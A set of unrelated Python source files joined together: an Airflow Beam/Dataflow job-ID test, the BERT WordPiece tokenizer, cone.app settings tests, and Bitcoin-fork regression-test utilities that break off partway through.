INFO:root:To access the Dataflow monitoring console, please navigate to https://console.cloud.google.com/\
dataflow/jobsDetail/locations/us-central1/jobs/{TEST_JOB_ID}?project=XXX
"""
APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG = f""""\
INFO:apache_beam.runners.dataflow.internal.apiclient:Completed GCS upload to gs://test-dataflow-example/\
staging/start-python-job-local-5bcf3d71.1592286719.303624/apache_beam-2.22.0-cp37-cp37m-manylinux1_x86_64.whl\
in 1 seconds.
INFO:apache_beam.runners.dataflow.internal.apiclient:Create job: <Job
createTime: '2020-06-16T05:52:04.095216Z'
currentStateTime: '1970-01-01T00:00:00Z'
id: '{TEST_JOB_ID}'
location: 'us-central1'
name: 'start-python-job-local-5bcf3d71'
projectId: 'XXX'
stageStates: []
startTime: '2020-06-16T05:52:04.095216Z'
steps: []
tempFiles: []
type: TypeValueValuesEnum(JOB_TYPE_BATCH, 1)>
INFO:apache_beam.runners.dataflow.internal.apiclient:Created job with id: [{TEST_JOB_ID}]
INFO:apache_beam.runners.dataflow.internal.apiclient:Submitted job: {TEST_JOB_ID}
INFO:apache_beam.runners.dataflow.internal.apiclient:To access the Dataflow monitoring console, please \
navigate to https://console.cloud.google.com/dataflow/jobs/us-central1/{TEST_JOB_ID}?project=XXX
"""
class TestDataflow(unittest.TestCase):
@parameterized.expand(
[
(APACHE_BEAM_V_2_14_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_JAVA_SDK_LOG,),
(APACHE_BEAM_V_2_14_0_PYTHON_SDK_LOG,),
(APACHE_BEAM_V_2_22_0_PYTHON_SDK_LOG,),
],
name_func=lambda func, num, p: f"{func.__name__}_{num}",
)
def test_data_flow_valid_job_id(self, log):
echos = ";".join(f"echo {shlex.quote(line)}" for line in log.split("\n"))
cmd = ["bash", "-c", echos]
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, TEST_JOB_ID)
def test_data_flow_missing_job_id(self):
cmd = ['echo', 'unit testing']
found_job_id = None
def callback(job_id):
nonlocal found_job_id
found_job_id = job_id
BeamCommandRunner(
cmd, process_line_callback=process_line_and_extract_dataflow_job_id_callback(callback)
).wait_for_done()
self.assertEqual(found_job_id, None)
@mock.patch('airflow.providers.apache.beam.hooks.beam.BeamCommandRunner.log')
@mock.patch('subprocess.Popen')
@mock.patch('select.select')
def test_dataflow_wait_for_done_logging(self, mock_select, mock_popen, mock_logging):
mock_logging.info = MagicMock()
mock_logging.warning = MagicMock()
mock_proc = MagicMock()
mock_proc.stderr = MagicMock()
mock_proc.stderr.readlines = MagicMock(return_value=['test\n', 'error\n'])
mock_stderr_fd = MagicMock()
mock_proc.stderr.fileno = MagicMock(return_value=mock_stderr_fd)
mock_proc_poll = MagicMock()
mock_select.return_value = [[mock_stderr_fd]]
def poll_resp_error():
mock_proc.return_code = 1
return True
mock_proc_poll.side_effect = [None, poll_resp_error]
mock_proc.poll = mock_proc_poll
mock_popen.return_value = mock_proc
dataflow = BeamCommandRunner(['test', 'cmd'])
mock_logging.info.assert_called_once_with('Running command: %s', 'test cmd')
self.assertRaises(Exception, dataflow.wait_for_done)
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes."""
import os, sys
sys.path.insert(0, os.getcwd())
import collections
import re
import unicodedata
import six
def validate_case_matches_checkpoint(do_lower_case, init_checkpoint):
"""Checks whether the casing config is consistent with the checkpoint name."""
# The casing has to be passed in by the user and there is no explicit check
# as to whether it matches the checkpoint. The casing information probably
# should have been stored in the bert_config.json file, but it's not, so
# we have to heuristically detect it to validate.
if not init_checkpoint:
return
m = re.match("^.*?([A-Za-z0-9_-]+)/bert_model.ckpt", init_checkpoint)
if m is None:
return
model_name = m.group(1)
lower_models = [
"uncased_L-24_H-1024_A-16", "uncased_L-12_H-768_A-12",
"multilingual_L-12_H-768_A-12", "chinese_L-12_H-768_A-12"
]
cased_models = [
"cased_L-12_H-768_A-12", "cased_L-24_H-1024_A-16",
"multi_cased_L-12_H-768_A-12"
]
is_bad_config = False
if model_name in lower_models and not do_lower_case:
is_bad_config = True
actual_flag = "False"
case_name = "lowercased"
opposite_flag = "True"
if model_name in cased_models and do_lower_case:
is_bad_config = True
actual_flag = "True"
case_name = "cased"
opposite_flag = "False"
if is_bad_config:
raise ValueError(
"You passed in `--do_lower_case=%s` with `--init_checkpoint=%s`. "
"However, `%s` seems to be a %s model, so you "
"should pass in `--do_lower_case=%s` so that the fine-tuning matches "
"how the model was pre-training. If this error is wrong, please "
"just comment out this check." % (actual_flag, init_checkpoint,
model_name, case_name, opposite_flag))
def convert_to_unicode(text):
"""Converts `text` to Unicode (if it's not already), assuming utf-8 input."""
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text.decode("utf-8", "ignore")
elif isinstance(text, unicode):
return text
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def printable_text(text):
"""Returns text encoded in a way suitable for print or `tf.logging`."""
# These functions want `str` for both Python2 and Python3, but in one case
# it's a Unicode string and in the other it's a byte string.
if six.PY3:
if isinstance(text, str):
return text
elif isinstance(text, bytes):
return text.decode("utf-8", "ignore")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
elif six.PY2:
if isinstance(text, str):
return text
elif isinstance(text, unicode):
return text.encode("utf-8")
else:
raise ValueError("Unsupported string type: %s" % (type(text)))
else:
raise ValueError("Not running on Python2 or Python 3?")
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
index = 0
with open(vocab_file, "r", encoding='utf-8') as reader:
while True:
token = convert_to_unicode(reader.readline())
if not token:
break
token = token.strip()
vocab[token] = index
index += 1
return vocab
def convert_by_vocab(vocab, items):
"""Converts a sequence of [tokens|ids] using the vocab."""
output = []
for item in items:
output.append(vocab[item])
return output
def convert_tokens_to_ids(vocab, tokens):
return convert_by_vocab(vocab, tokens)
def convert_ids_to_tokens(inv_vocab, ids):
return convert_by_vocab(inv_vocab, ids)
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class FullTokenizer(object):
"""Runs end-to-end tokenziation."""
def __init__(self, vocab_file, do_lower_case=True):
self.vocab = load_vocab(vocab_file)
self.inv_vocab = {v: k for k, v in self.vocab.items()}
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
return convert_by_vocab(self.vocab, tokens)
def convert_ids_to_tokens(self, ids):
return convert_by_vocab(self.inv_vocab, ids)
class BertTokenizer(object):
"""Runs end-to-end tokenization: punctuation splitting + wordpiece"""
def __init__(self, vocab_file, do_lower_case=True):
self.vocab = load_vocab(vocab_file)
self.ids_to_tokens = collections.OrderedDict(
[(ids, tok) for tok, ids in self.vocab.items()])
self.basic_tokenizer = BasicTokenizer(do_lower_case=do_lower_case)
self.wordpiece_tokenizer = WordpieceTokenizer(vocab=self.vocab)
def tokenize(self, text):
split_tokens = []
for token in self.basic_tokenizer.tokenize(text):
for sub_token in self.wordpiece_tokenizer.tokenize(token):
split_tokens.append(sub_token)
return split_tokens
def convert_tokens_to_ids(self, tokens):
"""Converts a sequence of tokens into ids using the vocab."""
ids = []
for token in tokens:
ids.append(self.vocab[token])
return ids
def convert_ids_to_tokens(self, ids):
"""Converts a sequence of ids in wordpiece tokens using the vocab."""
tokens = []
for i in ids:
tokens.append(self.ids_to_tokens[i])
return tokens
class BasicTokenizer(object):
"""Runs basic tokenization (punctuation splitting, lower casing, etc.)."""
def __init__(self, do_lower_case=True):
"""Constructs a BasicTokenizer.
Args:
do_lower_case: Whether to lower case the input.
"""
self.do_lower_case = do_lower_case
def tokenize(self, text):
"""Tokenizes a piece of text."""
text = convert_to_unicode(text)
text = self._clean_text(text)
# This was added on November 1st, 2018 for the multilingual and Chinese
# models. This is also applied to the English models now, but it doesn't
# matter since the English models were not trained on any Chinese data
# and generally don't have any Chinese data in them (there are Chinese
# characters in the vocabulary because Wikipedia does have some Chinese
# words in the English Wikipedia.).
text = self._tokenize_chinese_chars(text)
orig_tokens = whitespace_tokenize(text)
split_tokens = []
for token in orig_tokens:
if self.do_lower_case:
token = token.lower()
token = self._run_strip_accents(token)
split_tokens.extend(self._run_split_on_punc(token))
output_tokens = whitespace_tokenize(" ".join(split_tokens))
return output_tokens
def _run_strip_accents(self, text):
"""Strips accents from a piece of text."""
text = unicodedata.normalize("NFD", text)
output = []
for char in text:
cat = unicodedata.category(char)
if cat == "Mn":
continue
output.append(char)
return "".join(output)
def _run_split_on_punc(self, text):
"""Splits punctuation on a piece of text."""
chars = list(text)
i = 0
start_new_word = True
output = []
while i < len(chars):
char = chars[i]
if _is_punctuation(char):
output.append([char])
start_new_word = True
else:
if start_new_word:
output.append([])
start_new_word = False
output[-1].append(char)
i += 1
return ["".join(x) for x in output]
def _tokenize_chinese_chars(self, text):
"""Adds whitespace around any CJK character."""
output = []
for char in text:
cp = ord(char)
if self._is_chinese_char(cp):
output.append(" ")
output.append(char)
output.append(" ")
else:
output.append(char)
return "".join(output)
def _is_chinese_char(self, cp):
"""Checks whether CP is the codepoint of a CJK character."""
# This defines a "chinese character" as anything in the CJK Unicode block:
# https://en.wikipedia.org/wiki/CJK_Unified_Ideographs_(Unicode_block)
#
# Note that the CJK Unicode block is NOT all Japanese and Korean characters,
# despite its name. The modern Korean Hangul alphabet is a different block,
# as is Japanese Hiragana and Katakana. Those alphabets are used to write
# space-separated words, so they are not treated specially and handled
# like the all of the other languages.
if ((cp >= 0x4E00 and cp <= 0x9FFF) or #
(cp >= 0x3400 and cp <= 0x4DBF) or #
(cp >= 0x20000 and cp <= 0x2A6DF) or #
(cp >= 0x2A700 and cp <= 0x2B73F) or #
(cp >= 0x2B740 and cp <= 0x2B81F) or #
(cp >= 0x2B820 and cp <= 0x2CEAF) or
(cp >= 0xF900 and cp <= 0xFAFF) or #
(cp >= 0x2F800 and cp <= 0x2FA1F)): #
return True
return False
def _clean_text(self, text):
"""Performs invalid character removal and whitespace cleanup on text."""
output = []
for char in text:
cp = ord(char)
if cp == 0 or cp == 0xfffd or _is_control(char):
continue
if _is_whitespace(char):
output.append(" ")
else:
output.append(char)
return "".join(output)
class WordpieceTokenizer(object):
"""Runs WordPiece tokenziation."""
def __init__(self, vocab, unk_token="[UNK]", max_input_chars_per_word=200):
self.vocab = vocab
self.unk_token = unk_token
self.max_input_chars_per_word = max_input_chars_per_word
def tokenize(self, text):
"""Tokenizes a piece of text into its word pieces.
This uses a greedy longest-match-first algorithm to perform tokenization
using the given vocabulary.
For example:
input = "unaffable"
output = ["un", "##aff", "##able"]
Args:
text: A single token or whitespace separated tokens. This should have
already been passed through `BasicTokenizer.
Returns:
A list of wordpiece tokens.
"""
text = convert_to_unicode(text)
output_tokens = []
for token in whitespace_tokenize(text):
chars = list(token)
if len(chars) > self.max_input_chars_per_word:
output_tokens.append(self.unk_token)
continue
is_bad = False
start = 0
sub_tokens = []
while start < len(chars):
end = len(chars)
cur_substr = None
while start < end:
substr = "".join(chars[start:end])
if start > 0:
substr = "##" + substr
if substr in self.vocab:
cur_substr = substr
break
end -= 1
if cur_substr is None:
is_bad = True
break
sub_tokens.append(cur_substr)
start = end
if is_bad:
output_tokens.append(self.unk_token)
else:
output_tokens.extend(sub_tokens)
return output_tokens
def _is_whitespace(char):
"""Checks whether `chars` is a whitespace character."""
# \t, \n, and \r are technically contorl characters but we treat them
# as whitespace since they are generally considered as such.
if char == " " or char == "\t" or char == "\n" or char == "\r":
return True
cat = unicodedata.category(char)
if cat == "Zs":
return True
return False
def _is_control(char):
"""Checks whether `chars` is a control character."""
# These are technically control characters but we count them as whitespace
# characters.
if char == "\t" or char == "\n" or char == "\r":
return False
cat = unicodedata.category(char)
if cat.startswith("C"):
return True
return False
def _is_punctuation(char):
"""Checks whether `chars` is a punctuation character."""
cp = ord(char)
# We treat all non-letter/number ASCII as punctuation.
# Characters such as "^", "$", and "`" are not in the Unicode
# Punctuation class but we treat them as punctuation anyways, for
# consistency.
if ((cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or
(cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126)):
return True
cat = unicodedata.category(char)
if cat.startswith("P"):
return True
return False
|
from cone.app import get_root
from cone.app import register_plugin_config
from cone.app import testing
from cone.app.browser.ajax import AjaxAction
from cone.app.browser.form import Form
from cone.app.browser.settings import settings_tab_content
from cone.app.browser.settings import SettingsBehavior
from cone.app.model import BaseNode
from cone.tile import render_tile
from cone.tile import Tile
from cone.tile import tile
from cone.tile.tests import TileTestCase
from plumber import plumbing
from yafowil.base import factory
class SomeSettings(BaseNode):
pass
class OtherSettings(BaseNode):
pass
class TestBrowserSettings(TileTestCase):
layer = testing.security
def test_register_plugin_config(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
register_plugin_config('bar', SomeSettings)
register_plugin_config('baz', OtherSettings)
self.assertEqual(settings.factories.keys(), ['foo', 'bar', 'baz'])
err = self.expectError(
ValueError,
register_plugin_config,
'baz',
OtherSettings
)
self.assertEqual(str(err), "Config with name 'baz' already registered.")
def test_settings_content_tile(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
register_plugin_config('bar', SomeSettings)
register_plugin_config('baz', OtherSettings)
request = self.layer.new_request()
# Login and render 'content' tile on ``Settings`` node
with self.layer.authenticated('manager'):
res = render_tile(settings, request, 'content')
self.assertTrue(res.find('foo</a>') > -1)
self.assertTrue(res.find('bar</a>') > -1)
self.assertTrue(res.find('baz</a>') > -1)
# 'content' tile for ``SomeSettings``
with self.layer.hook_tile_reg():
@tile(name='content', interface=SomeSettings)
class SomeSettingsTile(Tile):
def render(self):
return '<div>Settings Contents</div>'
with self.layer.authenticated('manager'):
res = render_tile(settings['foo'], request, 'content')
self.assertEqual(res, '<div>Settings Contents</div>')
# 'content' tile for ``OtherSettings`` which raises an exception at
# render time
with self.layer.hook_tile_reg():
@tile(name='content', interface=OtherSettings)
class OtherSettingsTile(Tile):
def render(self):
msg = 'This tile can not be rendered for some reason'
raise Exception(msg)
with self.layer.authenticated('manager'):
err = self.expectError(
Exception,
render_tile,
settings['baz'],
request,
'content'
)
self.assertEqual(
str(err),
'This tile can not be rendered for some reason'
)
def test_SettingsBehavior(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
with self.layer.hook_tile_reg():
@tile(name='editform', interface=SomeSettings)
@plumbing(SettingsBehavior)
class SomeSettingsForm(Form):
def prepare(self):
form = factory(
u'form',
name='editform',
props={
'action': self.nodeurl
})
form['foo'] = factory(
'field:label:text',
props={
'label': 'Foo',
})
form['save'] = factory(
'submit',
props={
'action': 'save',
'expression': True,
'handler': None,
'next': self.next,
'label': 'Save',
})
self.form = form
request = self.layer.new_request()
request.params['action.editform.save'] = '1'
request.params['editform.foo'] = 'foo'
request.params['ajax'] = '1'
with self.layer.authenticated('manager'):
res = render_tile(settings['foo'], request, 'editform')
self.assertEqual(res, u'')
action = request.environ['cone.app.continuation'][0]
self.assertTrue(isinstance(action, AjaxAction))
self.assertEqual(action.selector, '.foo')
def test_settings_tab_content(self):
root = get_root()
settings = root['settings']
settings.factories.clear()
register_plugin_config('foo', SomeSettings)
register_plugin_config('baz', OtherSettings)
with self.layer.hook_tile_reg():
@tile(name='content', interface=SomeSettings)
class SomeSettingsTile(Tile):
def render(self):
return '<div>Settings Contents</div>'
@tile(name='content', interface=OtherSettings)
class OtherSettingsTile(Tile):
def render(self):
msg = 'This tile can not be rendered for some reason'
raise Exception(msg)
# Ajax view for tabs
request = self.layer.new_request()
with self.layer.authenticated('manager'):
response = settings_tab_content(settings['foo'], request)
self.assertEqual(
response.text,
'<div class="foo"><div>Settings Contents</div></div>'
)
with self.layer.authenticated('manager'):
response = settings_tab_content(settings['baz'], request)
self.checkOutput("""
<div class="baz">...Exception: This tile can not be rendered for some
reason\n</pre></div></div>
""", response.text)
|
#!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import hexlify, unhexlify
from decimal import Decimal, ROUND_DOWN
import hashlib
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s BTC too low! (Should be %s BTC)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 20) * fee_per_kB / 1000:
raise AssertionError("Fee of %s BTC too high! (Should be %s BTC)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hash256(byte_str):
sha256 = hashlib.sha256()
sha256.update(byte_str)
sha256d = hashlib.sha256()
sha256d.update(sha256.digest())
return sha256d.digest()[::-1]
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
timeout += time.time()
while attempt < attempts and time.time() < timeout:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.5)
# Print the cause of the timeout
assert_greater_than(attempts, attempt)
assert_greater_than(timeout, time.time())
raise RuntimeError('Unreachable')
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 8
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert(n <= MAX_NODES)
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_url(datadir, i, rpchost=None):
rpc_u, rpc_p = get_auth_cookie(datadir)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n):
datadir = os.path.join(dirname, "node" + str(n))
if not os.path.isdir(datadir):
os.makedirs(datadir)
rpc_u, rpc_p = rpc_auth_pair(n)
with open(os.path.join(datadir, "bitcrexcoin.conf"), 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("rpcuser=" + rpc_u + "\n")
f.write("rpcpassword=" + rpc_p + "\n")
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("listenonion=0\n")
f.write("enablezeromint=0\n")
f.write("precompute=0\n")
f.write("staking=0\n")
f.write("spendzeroconfchange=1\n")
return datadir
def rpc_auth_pair(n):
return 'rpcuser???' + str(n), 'rpcpass???' + str(n)
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def get_auth_cookie(datadir):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "bitcrexcoin.conf")):
with open(os.path.join(datadir, "bitcrexcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
with open(os.path.join(datadir, "regtest", ".cookie"), 'r') as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir):
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, "regtest", ".cookie"))
def get_bip9_status(node, key):
info = node.getblockchaininfo()
return info['bip9_softforks'][key]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for addr in [peer['addr'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(addr)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['addr'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
sync_blocks needs to be called with an rpc_connections set that has least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
# Use getblockcount() instead of waitforblockheight() to determine the
# initial max height because the two RPCs look at different internal global
# variables (chainActive vs latestBlock) and the former gets updated
# earlier.
time.sleep(5)
maxheight = max(x.getblockcount() for x in rpc_connections)
start_time = cur_time = time.time()
while cur_time <= start_time + timeout:
tips = [r.waitforblockheight(maxheight, int(wait * 1000)) for r in rpc_connections]
if all(t["height"] == maxheight for t in tips):
if all(t["hash"] == tips[0]["hash"] for t in tips):
return
raise AssertionError("Block sync failed, mismatched block hashes:{}".format(
"".join("\n {!r}".format(tip) for tip in tips)))
cur_time = time.time()
raise AssertionError("Block sync to height {} timed out:{}".format(
maxheight, "".join("\n {!r}".format(tip) for tip in tips)))
def sync_chain(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same best block
"""
while timeout > 0:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash == [best_hash[0]] * len(best_hash):
return
time.sleep(wait)
timeout -= wait
raise AssertionError("Chain sync failed: Best block hashes don't match")
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
while timeout > 0:
pool = set(rpc_connections[0].getrawmempool())
num_match = 1
for i in range(1, len(rpc_connections)):
if set(rpc_connections[i].getrawmempool()) == pool:
num_match = num_match + 1
if num_match == len(rpc_connections):
#if flush_scheduler:
#for r in rpc_connections:
# r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
timeout -= wait
raise AssertionError("Mempool sync failed")
# Transaction/Block functions
#############################
def find_output(node, txid, amount):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >= 0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
